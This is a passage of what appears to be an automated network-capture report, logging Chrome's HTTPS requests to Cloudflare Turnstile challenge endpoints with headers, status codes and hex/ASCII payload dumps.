                                                                          2024-10-01 22:42:53 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                          Data Ascii: invalid


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          20192.168.2.649746104.18.95.414434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:42:53 UTC814OUTGET /cdn-cgi/challenge-platform/h/g/pat/8cbff7d01962c33d/1727822571917/09924a35f3c758709af88e0a588b7cd2bbbe09a1e05bd9809c84033ada6e7c05/xRO-NWK2Qn8voTN HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          Cache-Control: max-age=0
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/u972b/0x4AAAAAAAwgo_4sU4R7BlsA/auto/fbE/normal/auto/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-10-01 22:42:53 UTC143INHTTP/1.1 401 Unauthorized
                                                                          Date: Tue, 01 Oct 2024 22:42:53 GMT
                                                                          Content-Type: text/plain; charset=UTF-8
                                                                          Content-Length: 1
                                                                          Connection: close
                                                                          2024-10-01 22:42:53 UTC1985INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 43 5a 4a 4b 4e 66 50 48 57 48 43 61 2d 49 34 4b 57 49 74 38 30 72 75 2d 43 61 48 67 57 39 6d 41 6e 49 51 44 4f 74 70 75 66 41 55 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                          Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gCZJKNfPHWHCa-I4KWIt80ru-CaHgW9mAnIQDOtpufAUAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                          2024-10-01 22:42:53 UTC1INData Raw: 4a
                                                                          Data Ascii: J


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          21192.168.2.649747104.18.95.414434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:42:54 UTC785OUTGET /cdn-cgi/challenge-platform/h/g/i/8cbff7d01962c33d/1727822571920/dF8dAYCSi2ZeUfY HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/u972b/0x4AAAAAAAwgo_4sU4R7BlsA/auto/fbE/normal/auto/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-10-01 22:42:54 UTC170INHTTP/1.1 200 OK
                                                                          Date: Tue, 01 Oct 2024 22:42:54 GMT
                                                                          Content-Type: image/png
                                                                          Content-Length: 61
                                                                          Connection: close
                                                                          Server: cloudflare
                                                                          CF-RAY: 8cbff7f43d5342cc-EWR
                                                                          2024-10-01 22:42:54 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0c 00 00 00 47 08 02 00 00 00 bc 88 31 1f 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                          Data Ascii: PNGIHDRG1IDAT$IENDB`


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          22192.168.2.649748104.18.94.414434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:42:55 UTC428OUTGET /cdn-cgi/challenge-platform/h/g/i/8cbff7d01962c33d/1727822571920/dF8dAYCSi2ZeUfY HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-10-01 22:42:55 UTC170INHTTP/1.1 200 OK
                                                                          Date: Tue, 01 Oct 2024 22:42:55 GMT
                                                                          Content-Type: image/png
                                                                          Content-Length: 61
                                                                          Connection: close
                                                                          Server: cloudflare
                                                                          CF-RAY: 8cbff7f81ecd4251-EWR
                                                                          2024-10-01 22:42:55 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0c 00 00 00 47 08 02 00 00 00 bc 88 31 1f 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                          Data Ascii: PNGIHDRG1IDAT$IENDB`


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          23192.168.2.649749104.18.95.414434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:42:55 UTC927OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1121365584:1727821582:FtjyX9VbAvqmLS5-UuL06udmIDQT7dp1rW-1y8F4S1Y/8cbff7d01962c33d/bcbf9bd71f426c2 HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 31384
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          Content-type: application/x-www-form-urlencoded
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          CF-Challenge: bcbf9bd71f426c2
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Origin: https://challenges.cloudflare.com
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/u972b/0x4AAAAAAAwgo_4sU4R7BlsA/auto/fbE/normal/auto/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-10-01 22:42:55 UTC16384OUTData Raw: 76 5f 38 63 62 66 66 37 64 30 31 39 36 32 63 33 33 64 3d 25 32 62 66 55 5a 52 7a 78 53 62 6d 62 43 59 39 4a 4e 4b 4e 37 6d 55 78 68 78 41 4e 36 4e 75 32 75 31 4e 57 4e 57 2d 68 68 55 43 53 34 78 39 4e 59 44 57 71 4e 74 75 4e 57 47 4e 39 53 78 51 4e 74 68 44 7a 31 4e 2d 37 5a 7a 4b 4e 4a 44 43 37 72 2d 71 73 75 4e 64 78 4e 57 42 61 61 5a 7a 30 4a 4e 32 5a 39 6a 51 71 77 43 52 43 31 4e 67 47 69 6f 6e 47 71 6c 4b 49 66 75 4e 57 47 64 62 78 63 6d 6d 7a 6f 32 4e 50 79 43 47 79 4e 6e 5a 39 77 4e 6a 73 51 69 4e 47 34 45 77 32 4e 58 78 4e 6f 74 55 6f 7a 44 68 55 4e 6f 77 32 55 70 37 32 43 69 78 44 79 4e 4b 73 5a 66 63 50 71 4e 78 44 78 43 76 73 6a 72 4e 39 71 4e 77 68 24 6f 77 32 73 50 64 2b 68 66 4e 75 61 79 61 41 75 63 4c 67 41 4c 73 64 62 55 31 74 34 7a 48 54
                                                                          Data Ascii: v_8cbff7d01962c33d=%2bfUZRzxSbmbCY9JNKN7mUxhxAN6Nu2u1NWNW-hhUCS4x9NYDWqNtuNWGN9SxQNthDz1N-7ZzKNJDC7r-qsuNdxNWBaaZz0JN2Z9jQqwCRC1NgGionGqlKIfuNWGdbxcmmzo2NPyCGyNnZ9wNjsQiNG4Ew2NXxNotUozDhUNow2Up72CixDyNKsZfcPqNxDxCvsjrN9qNwh$ow2sPd+hfNuayaAucLgALsdbU1t4zHT
                                                                          2024-10-01 22:42:55 UTC15000OUTData Raw: 75 7a 72 31 75 32 75 79 4e 4e 7a 65 2b 64 45 31 6a 54 7a 75 79 5a 4e 49 66 64 32 64 59 43 47 44 38 5a 57 34 5a 6d 55 59 5a 78 70 46 45 65 2b 62 7a 66 4e 5a 4e 34 4e 77 5a 43 54 5a 54 66 58 52 6d 34 5a 33 68 43 5a 78 71 62 4c 54 41 32 4e 62 4e 43 4e 7a 57 41 53 4e 45 4e 75 55 7a 79 4e 6c 79 78 44 7a 68 4e 7a 5a 64 62 4e 5a 4e 30 5a 6f 62 4e 4c 4e 4a 4e 55 59 78 4d 4a 69 5a 37 59 78 32 4e 74 5a 7a 4e 4e 50 4e 4d 5a 75 66 78 66 78 4a 5a 6f 4e 57 4c 4e 31 4e 55 5a 7a 62 4e 4c 4e 7a 61 78 55 4e 33 4e 4e 32 7a 79 5a 4b 4e 39 4e 78 55 4e 79 32 64 68 7a 4a 4e 4f 44 78 4a 4e 77 4e 37 2b 64 44 4e 7a 4e 6a 5a 7a 4e 43 79 4e 4f 61 4e 32 39 68 4e 56 5a 7a 62 43 77 5a 42 4e 72 62 78 69 5a 63 66 77 59 43 4a 78 6a 5a 39 32 39 47 44 53 4e 55 44 43 54 5a 6c 4e 37 44 7a 4a
                                                                          Data Ascii: uzr1u2uyNNze+dE1jTzuyZNIfd2dYCGD8ZW4ZmUYZxpFEe+bzfNZN4NwZCTZTfXRm4Z3hCZxqbLTA2NbNCNzWASNENuUzyNlyxDzhNzZdbNZN0ZobNLNJNUYxMJiZ7Yx2NtZzNNPNMZufxfxJZoNWLN1NUZzbNLNzaxUN3NN2zyZKN9NxUNy2dhzJNODxJNwN7+dDNzNjZzNCyNOaN29hNVZzbCwZBNrbxiZcfwYCJxjZ929GDSNUDCTZlN7DzJ
                                                                          2024-10-01 22:42:55 UTC300INHTTP/1.1 200 OK
                                                                          Date: Tue, 01 Oct 2024 22:42:55 GMT
                                                                          Content-Type: text/plain; charset=UTF-8
                                                                          Content-Length: 26808
                                                                          Connection: close
                                                                          cf-chl-gen: Ax+qFoIMtVidDeVGbGOjqivROt1+0XEH7JbrrsRosxF+71gdWIA1Uo+Dog9lhZgoSuZSksRZZXqzmWmt$ckuFSFVLRsFj2bm/
                                                                          Server: cloudflare
                                                                          CF-RAY: 8cbff7f8bbea4295-EWR
                                                                          2024-10-01 22:42:55 UTC1069INData Raw: 64 58 4a 6d 62 57 35 38 69 58 4f 51 6c 35 46 35 6b 71 53 53 6f 31 6c 61 6d 61 65 70 61 35 57 72 72 57 36 79 65 71 78 79 61 35 4a 77 6a 36 4f 31 6b 62 74 31 76 37 4f 52 6b 6f 4b 77 75 71 2b 41 6d 70 50 44 76 37 75 62 66 35 6e 44 73 4a 2b 6a 77 4d 76 44 6b 4b 6e 5a 30 38 50 4a 30 59 2b 75 30 4c 76 4c 6e 62 6e 6a 33 61 2f 48 33 4c 4c 72 6f 74 33 58 71 4d 58 76 36 4f 33 6d 36 63 2f 47 72 2b 6e 6a 73 74 48 37 39 50 6a 71 30 4e 2f 4d 42 63 2f 76 76 64 30 49 77 74 37 32 36 2b 72 4f 2b 4f 58 37 7a 4f 63 57 45 41 34 4b 30 77 37 36 43 4f 76 57 35 78 41 41 30 77 51 59 39 2b 58 37 46 52 37 70 42 79 54 39 2b 76 67 49 42 75 66 74 36 68 45 47 37 7a 49 6a 36 7a 54 30 4b 69 73 39 2f 66 59 56 2b 67 4d 4e 4e 30 45 47 4e 53 45 61 4e 6b 49 5a 4a 56 41 6d 48 78 30 6d 48 68 49
                                                                          Data Ascii: dXJmbW58iXOQl5F5kqSSo1lamaepa5WrrW6yeqxya5Jwj6O1kbt1v7ORkoKwuq+AmpPDv7ubf5nDsJ+jwMvDkKnZ08PJ0Y+u0LvLnbnj3a/H3LLrot3XqMXv6O3m6c/Gr+njstH79Pjq0N/MBc/vvd0Iwt726+rO+OX7zOcWEA4K0w76COvW5xAA0wQY9+X7FR7pByT9+vgIBuft6hEG7zIj6zT0Kis9/fYV+gMNN0EGNSEaNkIZJVAmHx0mHhI
                                                                          2024-10-01 22:42:55 UTC1369INData Raw: 72 31 76 64 6e 79 73 66 37 65 63 6c 4a 61 50 6f 4a 39 2f 67 4c 32 66 69 38 7a 48 6a 38 50 46 79 63 69 6b 30 4b 2b 6d 73 72 4c 4c 31 37 53 77 32 61 36 58 72 74 33 5a 78 72 79 7a 34 75 4c 53 33 38 48 71 31 2b 72 42 73 61 6a 4f 76 4e 62 4c 30 2f 4b 79 36 4c 62 73 78 2b 2f 66 76 65 44 7a 35 4f 58 46 31 37 6e 31 78 38 54 32 33 39 34 4f 2b 75 62 48 45 41 72 6e 30 78 55 51 79 76 72 76 30 68 63 5a 43 4e 76 79 38 78 63 46 2b 76 58 64 48 66 76 70 2f 53 73 67 39 51 6b 77 2b 68 45 6e 46 43 51 7a 4a 76 4c 30 4c 43 6b 79 37 67 6f 7a 49 42 4d 53 4d 43 49 43 49 7a 6b 70 50 52 55 63 2f 54 6f 4d 43 54 73 6b 49 31 49 2f 4b 77 78 55 54 69 6b 6a 57 56 51 50 58 68 59 2f 51 43 45 2b 51 52 74 6d 5a 44 64 69 4a 6b 56 66 4a 56 59 72 5a 55 67 74 51 46 56 6e 64 46 46 34 64 55 70 6f
                                                                          Data Ascii: r1vdnysf7eclJaPoJ9/gL2fi8zHj8PFycik0K+msrLL17Sw2a6Xrt3Zxryz4uLS38Hq1+rBsajOvNbL0/Ky6Lbsx+/fveDz5OXF17n1x8T2394O+ubHEArn0xUQyvrv0hcZCNvy8xcF+vXdHfvp/Ssg9Qkw+hEnFCQzJvL0LCky7gozIBMSMCICIzkpPRUc/ToMCTskI1I/KwxUTikjWVQPXhY/QCE+QRtmZDdiJkVfJVYrZUgtQFVndFF4dUpo
                                                                          2024-10-01 22:42:55 UTC1369INData Raw: 70 2f 75 37 4e 2f 6d 4c 2b 33 67 36 75 31 70 6f 36 58 75 61 79 63 30 62 32 79 76 39 58 42 74 64 4f 7a 78 62 76 4f 32 36 32 68 76 73 44 42 77 64 2b 65 32 4a 75 67 35 74 6a 62 36 71 76 70 34 61 37 4c 79 2b 4c 53 72 73 6a 47 2b 50 54 71 78 2b 69 78 33 2f 50 7a 2b 66 6a 52 34 4e 66 57 34 75 62 56 43 4f 58 2b 37 2b 4c 70 44 51 72 7a 31 65 7a 67 43 39 50 30 48 66 62 6e 45 77 41 4a 2b 42 50 66 47 43 4d 5a 48 69 45 4c 48 65 59 63 4a 51 38 6c 2b 43 66 75 4d 54 49 65 4c 54 41 59 42 54 44 33 45 77 67 48 2f 68 4d 2b 50 54 31 46 45 41 62 2b 41 54 31 42 4e 7a 77 6b 51 45 49 38 51 44 38 4d 53 77 77 74 53 7a 6c 55 4b 46 6f 74 4b 31 31 5a 54 79 78 4e 46 6b 52 59 57 46 35 64 4e 6a 34 6a 59 55 64 4b 59 47 78 45 58 43 31 73 61 6d 52 4b 5a 58 70 70 4d 30 30 33 54 56 70 53 56
                                                                          Data Ascii: p/u7N/mL+3g6u1po6Xuayc0b2yv9XBtdOzxbvO262hvsDBwd+e2Jug5tjb6qvp4a7Ly+LSrsjG+PTqx+ix3/Pz+fjR4NfW4ubVCOX+7+LpDQrz1ezgC9P0HfbnEwAJ+BPfGCMZHiELHeYcJQ8l+CfuMTIeLTAYBTD3EwgH/hM+PT1FEAb+AT1BNzwkQEI8QD8MSwwtSzlUKFotK11ZTyxNFkRYWF5dNj4jYUdKYGxEXC1samRKZXppM003TVpSV
                                                                          2024-10-01 22:42:55 UTC1369INData Raw: 44 77 4a 75 71 6f 4a 65 47 78 38 65 70 6a 59 62 52 79 4a 44 5a 7a 37 66 62 72 4d 75 71 74 4e 66 50 6d 63 54 62 30 2b 62 65 33 39 66 71 70 4c 76 4e 79 61 71 73 77 4e 47 74 76 38 75 2b 35 64 66 44 39 61 33 58 76 50 72 33 76 64 72 64 38 77 44 6b 35 76 6f 49 2f 66 37 59 44 64 63 44 33 77 6f 49 2f 73 38 4f 42 75 51 52 37 41 76 72 36 39 6e 75 44 51 7a 74 38 74 67 62 44 65 51 63 39 78 33 79 41 78 37 36 42 77 6f 69 2b 78 34 74 4b 67 6f 41 44 43 77 55 2b 54 63 31 42 78 63 61 47 6a 77 55 49 69 4d 62 47 43 39 41 50 6b 41 33 43 45 70 46 48 55 6b 6c 51 78 78 50 4e 68 55 66 54 54 42 4d 46 79 77 61 4c 30 30 35 58 79 74 56 51 53 31 53 52 57 52 59 52 56 51 2b 4e 30 42 45 51 6a 74 4c 53 45 59 2f 54 69 31 30 52 7a 6b 35 54 6b 64 56 56 46 4a 4c 54 33 4f 43 63 46 68 76 55 30
                                                                          Data Ascii: DwJuqoJeGx8epjYbRyJDZz7fbrMuqtNfPmcTb0+be39fqpLvNyaqswNGtv8u+5dfD9a3XvPr3vdrd8wDk5voI/f7YDdcD3woI/s8OBuQR7Avr69nuDQzt8tgbDeQc9x3yAx76Bwoi+x4tKgoADCwU+Tc1BxcaGjwUIiMbGC9APkA3CEpFHUklQxxPNhUfTTBMFywaL005XytVQS1SRWRYRVQ+N0BEQjtLSEY/Ti10Rzk5TkdVVFJLT3OCcFhvU0
                                                                          2024-10-01 22:42:55 UTC1369INData Raw: 69 4d 61 39 78 37 57 2f 77 71 76 46 73 38 6d 6f 70 4a 62 4d 31 4c 66 54 6e 72 4f 68 74 74 50 6a 76 5a 2b 6e 32 4e 76 57 76 37 33 64 33 71 53 7a 38 63 58 31 34 75 6e 47 36 4f 6e 62 78 2f 6d 37 38 76 48 63 42 4c 7a 36 38 66 76 70 38 2f 62 66 2b 65 66 39 32 38 76 35 34 4f 33 51 36 4f 67 4f 46 66 6a 37 36 76 76 74 31 52 66 74 2b 50 63 57 47 42 33 78 49 79 55 42 4b 42 34 70 43 76 77 69 2f 66 34 47 36 69 6b 6c 37 77 51 44 45 42 54 7a 2b 52 54 30 50 6a 45 68 49 44 30 64 47 52 30 2f 42 69 63 61 2f 55 49 4a 4c 56 41 70 4b 56 4d 65 48 67 67 30 46 42 49 59 54 31 70 4c 4b 79 30 6f 50 69 77 73 54 6a 63 65 57 30 49 68 50 54 35 4d 48 30 74 65 5a 47 45 2f 63 54 52 48 54 31 4a 70 56 56 74 4f 62 6e 64 32 62 7a 78 73 64 47 35 75 64 6d 42 32 56 46 6c 44 67 6c 31 62 58 33 79
                                                                          Data Ascii: iMa9x7W/wqvFs8mopJbM1LfTnrOhttPjvZ+n2NvWv73d3qSz8cX14unG6Onbx/m78vHcBLz68fvp8/bf+ef928v54O3Q6OgOFfj76vvt1Rft+PcWGB3xIyUBKB4pCvwi/f4G6ikl7wQDEBTz+RT0PjEhID0dGR0/Bica/UIJLVApKVMeHgg0FBIYT1pLKy0oPiwsTjceW0IhPT5MH0teZGE/cTRHT1JpVVtObnd2bzxsdG5udmB2VFlDgl1bX3y
                                                                          2024-10-01 22:42:55 UTC1369INData Raw: 59 6e 46 6b 73 32 70 73 74 4b 58 6d 71 33 54 7a 65 4c 61 6f 37 66 68 31 62 48 4a 75 38 4c 4a 32 39 72 6c 77 2f 47 6c 34 61 37 70 78 63 37 75 73 37 62 4a 38 75 6e 2b 39 72 2f 55 37 66 48 4e 38 66 76 56 42 50 4c 5a 33 2b 63 50 43 76 30 48 30 67 76 74 42 77 37 58 46 65 49 44 2b 67 63 4c 39 4e 76 73 49 43 4c 66 38 2f 67 59 48 68 45 4c 47 43 49 44 44 68 77 50 38 4f 4d 77 42 2b 30 4a 4a 69 38 73 36 79 6e 33 4c 50 30 73 2b 66 34 4f 4d 79 31 46 49 30 51 6f 52 52 67 2f 4b 77 6f 5a 51 78 38 4a 43 45 42 4f 4c 7a 42 55 4b 55 6f 69 54 6c 55 57 4d 56 4a 57 50 7a 78 69 4e 56 49 2f 5a 44 31 53 53 79 52 58 52 45 39 75 5a 32 45 79 62 7a 4a 31 56 48 5a 7a 59 6c 73 30 5a 31 52 66 66 48 71 43 59 34 42 75 67 57 42 33 61 58 6c 72 66 59 46 4b 54 59 4e 6b 54 32 68 4c 66 33 31 49
                                                                          Data Ascii: YnFks2pstKXmq3TzeLao7fh1bHJu8LJ29rlw/Gl4a7pxc7us7bJ8un+9r/U7fHN8fvVBPLZ3+cPCv0H0gvtBw7XFeID+gcL9NvsICLf8/gYHhELGCIDDhwP8OMwB+0JJi8s6yn3LP0s+f4OMy1FI0QoRRg/KwoZQx8JCEBOLzBUKUoiTlUWMVJWPzxiNVI/ZD1SSyRXRE9uZ2EybzJ1VHZzYls0Z1RffHqCY4BugWB3aXlrfYFKTYNkT2hLf31I
                                                                          2024-10-01 22:42:55 UTC1369INData Raw: 4b 57 6e 37 75 32 34 38 36 37 72 5a 33 69 32 63 71 68 71 39 58 49 70 39 72 64 30 66 50 48 76 38 2f 33 7a 4f 58 56 73 72 76 6c 32 4c 58 36 30 39 34 42 32 4e 76 6a 76 51 50 35 35 41 7a 67 36 2b 6b 51 35 4f 76 5a 79 64 50 7a 38 63 38 43 30 75 33 54 38 50 66 36 48 66 51 4b 2f 64 72 6a 39 77 44 66 45 2f 73 4a 4c 41 44 33 43 2b 63 46 42 42 41 30 43 44 59 54 4f 43 49 36 47 54 6b 52 48 42 50 31 4f 7a 59 65 2b 67 4e 47 49 55 67 63 53 68 49 43 52 79 77 73 42 6b 73 73 4d 56 51 70 4b 44 49 50 55 69 51 30 45 31 63 38 50 6d 41 30 59 6a 59 62 54 30 42 42 5a 54 31 41 52 43 52 41 62 6b 67 6d 61 30 52 54 64 45 6c 51 50 69 34 33 65 6c 55 30 5a 31 52 54 4e 31 56 79 58 6a 74 75 55 47 59 2f 58 56 78 6b 51 6f 64 67 62 6b 64 51 66 6e 4b 52 61 57 68 30 55 47 31 77 65 6c 4e 63 65
                                                                          Data Ascii: KWn7u24867rZ3i2cqhq9XIp9rd0fPHv8/3zOXVsrvl2LX6094B2NvjvQP55Azg6+kQ5OvZydPz8c8C0u3T8Pf6HfQK/drj9wDfE/sJLAD3C+cFBBA0CDYTOCI6GTkRHBP1OzYe+gNGIUgcShICRywsBkssMVQpKDIPUiQ0E1c8PmA0YjYbT0BBZT1ARCRAbkgma0RTdElQPi43elU0Z1RTN1VyXjtuUGY/XVxkQodgbkdQfnKRaWh0UG1welNce
                                                                          2024-10-01 22:42:55 UTC1369INData Raw: 69 75 2b 66 51 70 73 53 69 31 72 66 46 70 38 4b 70 72 36 72 65 35 2f 53 74 31 64 66 4d 36 66 43 75 31 2f 76 4e 39 64 71 36 31 77 44 38 76 64 63 42 75 2f 6a 62 41 4c 2f 39 79 77 44 51 45 38 77 4a 30 38 30 44 39 2f 63 59 2b 78 6e 37 44 67 48 7a 37 51 54 6a 38 52 63 50 35 77 49 70 4b 66 67 75 42 77 2f 6f 4c 67 38 64 48 76 30 68 37 52 59 4f 4d 2f 45 78 44 41 59 64 4f 77 34 7a 4b 77 51 61 52 55 55 56 52 69 4d 72 42 55 6f 75 4f 54 6f 61 51 41 6f 79 4b 6b 38 51 4e 79 67 69 4f 30 63 71 54 30 63 67 51 6d 46 68 4d 53 4d 2f 52 79 46 6d 53 56 56 57 61 54 78 63 4c 45 4d 78 56 47 39 45 55 6e 63 34 59 6c 70 38 63 47 5a 52 59 48 6c 39 51 49 42 6b 67 57 52 32 61 56 78 57 61 6b 78 61 67 6f 39 4b 53 6d 43 51 61 58 52 30 6d 49 79 42 57 6f 36 53 65 33 69 65 62 33 78 37 6b 35
                                                                          Data Ascii: iu+fQpsSi1rfFp8Kpr6re5/St1dfM6fCu1/vN9dq61wD8vdcBu/jbAL/9ywDQE8wJ080D9/cY+xn7DgHz7QTj8RcP5wIpKfguBw/oLg8dHv0h7RYOM/ExDAYdOw4zKwQaRUUVRiMrBUouOToaQAoyKk8QNygiO0cqT0cgQmFhMSM/RyFmSVVWaTxcLEMxVG9EUnc4Ylp8cGZRYHl9QIBkgWR2aVxWakxago9KSmCQaXR0mIyBWo6Se3ieb3x7k5


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          24192.168.2.649750104.18.94.414434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:42:56 UTC487OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1121365584:1727821582:FtjyX9VbAvqmLS5-UuL06udmIDQT7dp1rW-1y8F4S1Y/8cbff7d01962c33d/bcbf9bd71f426c2 HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-10-01 22:42:56 UTC349INHTTP/1.1 404 Not Found
                                                                          Date: Tue, 01 Oct 2024 22:42:56 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 7
                                                                          Connection: close
                                                                          cf-chl-out: iABQd8T5oRdI+YoqoZN7W1iXyt8LDzDMyUY=$5MceBAlnseEyNTMt
                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          Server: cloudflare
                                                                          CF-RAY: 8cbff7fe5f8242a3-EWR
                                                                          2024-10-01 22:42:56 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                          Data Ascii: invalid


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          25192.168.2.649755104.18.95.414434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:43:06 UTC927OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1121365584:1727821582:FtjyX9VbAvqmLS5-UuL06udmIDQT7dp1rW-1y8F4S1Y/8cbff7d01962c33d/bcbf9bd71f426c2 HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 33861
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          Content-type: application/x-www-form-urlencoded
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          CF-Challenge: bcbf9bd71f426c2
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Origin: https://challenges.cloudflare.com
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/u972b/0x4AAAAAAAwgo_4sU4R7BlsA/auto/fbE/normal/auto/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
